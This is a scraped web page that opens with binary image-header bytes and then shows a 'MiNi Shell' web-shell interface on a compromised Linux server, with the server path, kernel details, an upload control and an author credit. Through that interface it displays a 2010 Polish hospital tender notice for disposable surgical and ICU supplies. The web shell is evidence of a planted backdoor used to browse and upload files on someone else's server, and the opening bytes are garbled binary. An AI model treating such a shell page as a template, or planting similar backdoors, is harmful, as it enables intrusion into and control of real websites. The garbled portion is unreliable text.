JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100622/177714-N-2010.html

<p class="kh_header"><b>Lublin: Dostawa sprzętu jednorazowego użytku na blok operacyjny i OIT</b><br>
<b>Numer ogłoszenia: 177714 - 2010; data zamieszczenia: 22.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 1 Szpital Wojskowy z Przychodnią Samodzielny Publiczny Zakład Opieki Zdrowotnej , Al. Racławickie 23, 20-904 Lublin, woj. lubelskie, tel. 081 7183203.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.1szw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu jednorazowego użytku na blok operacyjny i OIT.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Dostawa sprzętu jednorazowego użytku na blok operacyjny i OIT:
Część nr  1. Folie chirurgiczne i paski do zamykania ran;
Część nr 2. Katetery i materiał urologiczny;
Część nr 3. Obłożenia
Część nr 4. Igły i wkłucia centralne;
Część nr 5. Akcesoria do respiratora i ssaka
Część nr 6. Pojemniki do gromadzenia płynów
Część nr 7. Maska anestetyczna 	
 
2.Szczegółowy opis przedmiotu zamówienia  - zawarty jest w załączniku nr 1 do SIWZ i w formularzach cenowych na poszczególne części zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.12.00-2, 33.14.16.40-8, 33.19.90.00-1, 33.14.13.20-9, 33.14.13.28-5, 33.17.11.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każda oferta musi być zabezpieczona wadium o wartości:
-  150,00 zł (słownie: sto pięćdziesiąt  złotych) dla części nr 1  
-  800,00 zł ( słownie : osiemset  złotych ) dla części 2
-  950,00 zł ( słownie: dziewięćset pięćdziesiąt złotych ) dla części 3
-  600,00 zł ( słownie: sześćset  złotych ) dla części 4
-  850,00 zł ( słownie: osiemset pięćdziesiąt  złotych ) dla części 5.
- 1 200,00 zł ( słownie: jeden tysiąc dwieście złotych ) dla części 6.
- 150,00 zł (słownie: sto pięćdziesiąt  złotych) dla części nr 7  
2.	Wadium może być wniesione w jednej lub w kilku następujących formach:
-	pieniądzu;
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
      z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
-	gwarancjach bankowych;
-	gwarancjach ubezpieczeniowych;
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	Na   potwierdzenie   spełnienia   warunku   sytuacji   ekonomicznej   i   finansowej Zamawiający wymaga:
opłaconej polisy ubezpieczenia OC, a w przypadku jej braku innego dokumentu
potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej
w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz cenowy sporządzony wg wzoru załączonego do SIWZ oddzielnie dla każdej części.
2. Dowód wniesienia wadium
3. Aktualny odpis z właściwego rejestru (KRS) albo aktualne zaświadczenie o wpisie
do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, w celu potwierdzenia, iż oferta została podpisana przez osobę(-y) właściwie umocowaną, jeśli nie wynika to z innych dokumentów załączonych do oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający zastrzega sobie prawo opcji, tzn.:
a)	jednostronnego zmniejszenia wielkości zamówienia na każdej z pozycji w obrębie danej części przedmiotu zamówienia (każdy asortyment) o maksimum 30% ilości ujętych w formularzu cenowym.
b)	zwiększenia ilości jednej pozycji, kompensując to zmniejszeniem ilości innej pozycji w obrębie danej części zamówienia, z zachowaniem cen jednostkowych zawartych w formularzu cenowym. Kompensacja nie może zmienić całkowitej wartości umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.1szw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 1 Szpital Wojskowy z Przychodnią Samodzielny Publiczny Zakład Opieki Zdrowotnej        Al. Racławickie 23, 20-904 Lublin, budynek nr 6, pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2010 godzina 10:00, miejsce: 1 Szpital Wojskowy z Przychodnią Samodzielny Publiczny Zakład Opieki Zdrowotnej 
Al. Racławickie 23, 20-904 Lublin, budynek nr 6, pokój nr 28.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część nr  1. Folie chirurgiczne i paski do zamykania ran.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Folia chirurgiczna   19 x 25 cm	szt.	80
Folia chirurgiczna   28X 41 cm	szt.	100
Folia chirurgiczna   50 x 45 cm	szt.	80
Folia chirurgiczna   60 x 60 cm	szt.	50
Paski do zamykania ran 3mm x 75 mm	szt.	150
Paski do zamykania ran 6 mm x 75 mm	szt.	350
Paski do zamykania ran 6 mm x 38 mm	szt.	150
Paski do zamykania ran 6mm x 100 mm	szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część nr 2. Katetery i materiał urologiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kateter do odsysania pola operacyjnego dł. 200 cm z otworem kontrolującym 	szt.	350;
2	Kateter do odsysania pola operacyjnego dł. 200 cm bez otworu kontrolującego 	szt.	180;
3	Kateter do odsysania pola operacyjnego dł. 200 cm neurochirurgiczny zagięty pod kątem 900	szt.	180;
4	Dren do odsysania pola operacyjnego 
	szt.	180;
5	Zestaw do drenażu przezskórnego metodą jednostopniową:
	komp	30;
6	Łącznik do drenów i ssaków

	szt.	172;
7	Kateter do histerosalpingografii
	szt.	15;
8	Katetery do embolektomii dwukanałowe

	szt.	6;
9	Zestaw do szynowania wewnętrznego moczowodów
	komp	40;
10	Zestaw do szynowania wewnętrznego moczowodów oba końce zamknięte
 ( śródoperacyjny)

	komp	40;
11	Zestaw do nefrostomii 

	komp	15;
12	Zestaw do wymiany kateterów

	komp	17;
13	Zestaw do cystotomii

	komp	15;
14	Zestaw do szynowania moczowodów z kateterem o zmiennej średnicy 
	szt	7;
15	Prowadnik typu LUNDEROUISTA J

	szt	18;
16	Kateter moczowodowy pojedynczy Pigtail, X- RAY	szt.	8
17	Kateter moczowodowy 

	szt.	180;
18	Prowadnik pokryty teflonem
	szt.	40;
19	Łącznik miękki 25 cm do pojemników do drenażu	szt.	100
20	Igła dwuczęściowa do PCNL 
18G | 20 cm	szt.	18;
21	Endoproteza typ prosty

	szt.	7;
22	Igła VANGA 	szt.	3;
23	Zestaw do szynowania moczowodów z kateterem o zmiennej średnicy 
	szt.	8;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2, 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część nr 3. Obłożenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Czepek pielęgniarski okrągły z włókniny polipropylenowej 	szt	3300;
2	Czepek chirurgiczny wykonany z nierozciągliwej włókniny wiskozowej  	szt	1500;
3	Czepek chirurgiczny podwyższony 	szt	2500;
4	Maska chirurgiczna trójwarstwowa 	szt	9700;
5	Higieniczne prześcieradło nieprzemakalne 	szt	180;
6	Sterylny pełnochronny fartuch chirurgiczny posiadający dodatkowe nieprzemakalne wstawki-rozmiar L	szt	10;
7	Sterylny pełnochronny fartuch chirurgiczny posiadający dodatkowe nieprzemakalne wstawki-rozmiar XL
	szt	10;
8	Sterylny pełnochronny fartuch chirurgiczny-rozmiar L	szt	500;
9	Sterylny pełnochronny fartuch chirurgiczny-rozmiar XL	szt	500;
10	Sterylny zestaw serwet uniwersalnych                                                                            	szt	80;
11	Sterylny obłożenie do operacji brzuszno-kroczowych 	szt	60;
12	Sterylne obłożenie do operacji stawu biodrowego                                                                                                                                        	szt	40;
13	Sterylny zestaw serwet do zabiegów urologicznych TUR                                                                                                                 	szt	50;
14	Sterylny zestaw serwet do zabiegów laryngologicznych.	szt	20;
15	Sterylna serweta do zabiegu cystoskopii 	szt	20;
16	Sterylna serweta do zabiegu cystoskopii- zawiera dwie osłony na kończyny 	szt	30;
17	Sterylne obłożenie urologiczne do zabiegów P.C.N.L. 	szt	5;
18	 Sterylne obłożenie do zabiegów ginekologicznych dolnych 	szt	20;
19	Sterylny pokrowiec na przewody do artroskopii lub laparoskopii 	szt	370;
20	Sterylne obłożenie do artroskopii kolana 	szt	10;
21	Ubranie chirurgiczne - bluza + spodnie 	szt	100;
22	Sterylne obłożenie okulistyczne	szt	20;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część nr 4. Igły i wkłucia centralne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Igła  do  znieczuleń  podpajęczynówkowych  ze  szlifem  Quinckego-rozmiar 27G/88mm	szt.	150;
2	Igła  do  znieczuleń  podpajęczynówkowych  ze  szlifem  Quinckego-rozmiar 26G/88mm	szt.	150;
3	Igła  do  znieczuleń  podpajęczynówkowych  ze  szlifem  Quinckego-rozmiar 25G/88mm	szt.	100;
4	Igła  do  znieczuleń  podpajęczynówkowych  ze  szlifem  Quinckego-rozmiar 20G/88mm	szt.	50;
5	Igła  do  znieczuleń  podpajęczynówkowych  z  prowadnicą  w  komplecie  z  dwustrefowym  szlifem - rozmiar 26G/88mm                             	szt.	100;
6	Zestaw  do  pobierania  wydzieliny  z  tchawicy	szt.	50;
7	Przedłużacz  Haidelberger  dł. 100-140 cm	szt.	70;
8	Dren  do  podawania  płynów  podstawowych  oraz  żywienia  pozajelitowego  pompą  typu  Infusomat  	szt.	450;
9	Trokar  jednorazowy  o  śr. 11mm , tuleja  gwintowana dł.100mm	op.	1;
10	Klipsy  tytanowe  ML , szer. 8,1mm ; wys. 7,9mm pakowane  w  magazynki  po  6 szt. ; op. 120 szt	op.	2;
11	Zestaw  do  pomiaru  ciśnienia  metodą  krwawą	szt.	30;
12	Zespół  kraników , rampa  5-kranikowa ( wielokolorowa ) , bez  drenu	szt.	20;
13	Szew obarczający,przeciwewentrakcyjny,stalowy 	op.	8;
14	Cewnik  jednoświatłowy  do  cewnikowania  żyły  głównej 	szt.	20;
15	Cewnik  dwuświatłowy  do  cewnikowania  żyły  głównej	szt.	20;
16	Cewnik  trójświatłowy  do  cewnikowania  żyły  głównej 	szt.	20;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9, 33.14.13.28-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część nr 5. Akcesoria do respiratora i ssaka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zamknięty system do zimnego nawilżania  typu RespiFlo	szt.	8;
2	układ odechowy anestezjologiczny	szt.	200;
3	Obwód oddechowy anestetyczny jednorazowy.	szt.	400;
4	Obwód oddechowy  - wykonany z PCW	szt.	100;
5	Wymiennik ciepła i wilgoci tzw. Sztuczny nos	szt.	800;
6	Łącznik ze złączem kątowym podwójnie obrotowym 	szt.	100;
7	Łącznik prosty 7/16 cm, złącze 15F-15M, jałowy	szt.	100;
8	Łącznik kątowy 90 stopni, 10 cm, złącze 22M/15F, złącze respiratora 15M,jałowy	szt.	100;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część nr 6. Pojemniki do gromadzenia płynów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Sztywny, przeźroczysty pojemnik do gromadzenia płynów, jednorazowego użytku o pojemności  0,8 l	szt.	1200;
2	Sztywny, przeźroczysty pojemnik do gromadzenia płynów, jednorazowego użytku o pojemności 1,2 l	szt.	480;
3	Sztywny, przeźroczysty pojemnik do gromadzenia płynów, jednorazowego użytku o pojemności  2,0 l 	szt.	1200;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część nr 7. Maska anestetyczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Maska anestetyczna  rozmiary 2-6  jednorazowa, mikrobiologicznie czysta.	szt.	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com